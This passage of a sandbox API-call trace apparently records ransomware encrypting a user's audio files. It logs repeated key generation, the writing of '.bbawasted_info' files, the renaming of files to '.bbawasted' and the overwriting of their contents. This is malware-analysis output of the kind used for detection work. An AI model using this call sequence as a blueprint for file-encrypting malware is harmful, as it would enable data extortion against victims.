hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x18e1f [0073.749] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18e1f) returned 0xfe0000 [0073.749] CloseHandle (hObject=0x110) returned 1 [0073.754] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.755] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.755] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.755] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.755] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.755] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.764] SetEndOfFile (hFile=0x120) returned 1 [0073.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.766] CloseHandle (hObject=0x120) returned 1 [0073.773] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abe80 | out: hHeap=0x580000) returned 1 [0073.773] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cedd8 | out: hHeap=0x580000) returned 1 [0073.773] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.774] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.774] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.774] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OPxHf76QeD.wav") returned 54 [0073.774] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x276) returned 0x5d0700 [0073.774] lstrcpyW (in: lpString1=0x5d076c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.774] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.774] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.775] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.775] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OPxHf76QeD.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\opxhf76qed.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.776] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.777] SetEndOfFile (hFile=0x120) returned 1 [0073.777] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.777] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.777] lstrcpyW (in: lpString1=0x5d076c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OPxHf76QeD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\opxhf76qed.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OPxHf76QeD.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\opxhf76qed.wav.bbawasted")) returned 1 [0073.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OPxHf76QeD.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\opxhf76qed.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.778] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0073.778] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xb3d4 [0073.778] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb3d4) returned 0x570000 [0073.778] CloseHandle (hObject=0x11c) returned 1 [0073.781] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.782] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.782] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.782] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.782] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.782] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.791] SetEndOfFile (hFile=0x120) returned 1 [0073.793] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.793] CloseHandle (hObject=0x120) returned 1 [0073.795] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0073.795] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9660 | out: hHeap=0x580000) returned 1 [0073.795] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.796] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.796] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.796] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pUEo.m4a") returned 48 [0073.796] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26a) returned 0x5d0700 [0073.796] lstrcpyW (in: lpString1=0x5d0760, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.796] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.796] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.797] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.797] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pUEo.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pueo.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.797] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.798] SetEndOfFile (hFile=0x120) returned 1 [0073.798] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.798] lstrcpyW (in: lpString1=0x5d0760, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pUEo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pueo.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pUEo.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pueo.m4a.bbawasted")) returned 1 [0073.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pUEo.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pueo.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.799] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.799] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x10a1a [0073.799] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10a1a) returned 0xfe0000 [0073.799] CloseHandle (hObject=0x110) returned 1 [0073.803] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.804] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.804] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.804] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.804] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.804] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.813] SetEndOfFile (hFile=0x120) returned 1 [0073.816] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.816] CloseHandle (hObject=0x120) returned 1 [0073.817] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0073.817] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x580000) returned 1 [0073.817] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.818] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.818] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\2TyK.m4a") returned 68 [0073.818] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5bf070 [0073.818] lstrcpyW (in: lpString1=0x5bf0f8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.818] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.818] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.819] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.819] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\2TyK.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\2tyk.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.820] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.821] SetEndOfFile (hFile=0x120) returned 1 [0073.821] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.821] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.821] lstrcpyW (in: lpString1=0x5bf0f8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\2TyK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\2tyk.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\2TyK.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\2tyk.m4a.bbawasted")) returned 1 [0073.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\2TyK.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\2tyk.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.822] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0073.822] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x11ac4 [0073.822] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11ac4) returned 0xfe0000 [0073.822] CloseHandle (hObject=0x11c) returned 1 [0073.826] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.827] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.827] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.827] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.828] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.828] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.836] SetEndOfFile (hFile=0x120) returned 1 [0073.839] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.839] CloseHandle (hObject=0x120) returned 1 [0073.840] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0073.840] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cb990 | out: hHeap=0x580000) returned 1 [0073.840] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.841] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.841] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.841] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\2VQB3fP2Y9pha0rG.wav") returned 80 [0073.841] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5bf070 [0073.841] lstrcpyW (in: lpString1=0x5bf110, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.841] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.841] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.842] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.842] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\2VQB3fP2Y9pha0rG.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\2vqb3fp2y9pha0rg.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.842] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.843] SetEndOfFile (hFile=0x120) returned 1 [0073.844] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.844] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.844] lstrcpyW (in: lpString1=0x5bf110, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\2VQB3fP2Y9pha0rG.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\2vqb3fp2y9pha0rg.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\2VQB3fP2Y9pha0rG.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\2vqb3fp2y9pha0rg.wav.bbawasted")) returned 1 [0073.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\2VQB3fP2Y9pha0rG.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\2vqb3fp2y9pha0rg.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.844] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.845] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xcce0 [0073.845] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcce0) returned 0x570000 [0073.845] CloseHandle (hObject=0x110) returned 1 [0073.848] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.849] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.849] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.849] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.850] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.850] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.858] SetEndOfFile (hFile=0x120) returned 1 [0073.860] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.860] CloseHandle (hObject=0x120) returned 1 [0073.862] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0073.862] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c1150 | out: hHeap=0x580000) returned 1 [0073.862] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.862] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.862] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.863] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\6Q6acN5.m4a") returned 71 [0073.863] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x298) returned 0x5bf070 [0073.863] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.863] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.863] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.863] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.863] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\6Q6acN5.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\6q6acn5.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.864] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.865] SetEndOfFile (hFile=0x120) returned 1 [0073.865] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.865] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.865] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.865] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\6Q6acN5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\6q6acn5.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\6Q6acN5.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\6q6acn5.m4a.bbawasted")) returned 1 [0073.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\6Q6acN5.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\6q6acn5.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.866] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0073.866] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x6814 [0073.866] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6814) returned 0x570000 [0073.866] CloseHandle (hObject=0x11c) returned 1 [0073.868] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.869] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.869] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.869] CryptAcquireContextW (in: 